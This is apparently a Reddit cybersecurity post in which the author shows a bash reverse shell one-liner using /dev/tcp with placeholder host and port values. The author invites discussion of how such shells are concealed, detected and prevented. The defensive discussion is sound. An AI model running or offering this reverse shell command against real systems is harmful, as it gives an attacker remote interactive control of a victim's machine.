June 12, 2022, 9:16 a.m. | /u/gruvboxer

cybersecurity www.reddit.com

I've been fiddling with TCP reverse shells **for Unix-like systems**.
e.g.

bash -i >& /dev/tcp/<ip>/<port> 0>&1

I've extended this to keep it alive and run in the background, which has greatly raised my interest and concerns.

I'd like to open discussion around:

\- how reverse shells are typically concealed

\- how we can detect this kind of activity on already compromised machines

\- what can be done to prevent these from succeeding when an authenticated user plants one

cybersecurity reverse systems unix

SOC 2 Manager, Audit and Certification

@ Deloitte | US and CA Multiple Locations

Information Security Engineers

@ D. E. Shaw Research | New York City

Security Engineer, Incident Response

@ Databricks | Remote - Netherlands

Associate Vulnerability Engineer - Mid-Atlantic region (Part-Time)

@ GuidePoint Security LLC | Remote in VA, MD, PA, NC, DE, NJ, or DC

Data Security Architect

@ Accenture Federal Services | Washington, DC

Identity Security Administrator

@ SailPoint | Pune, India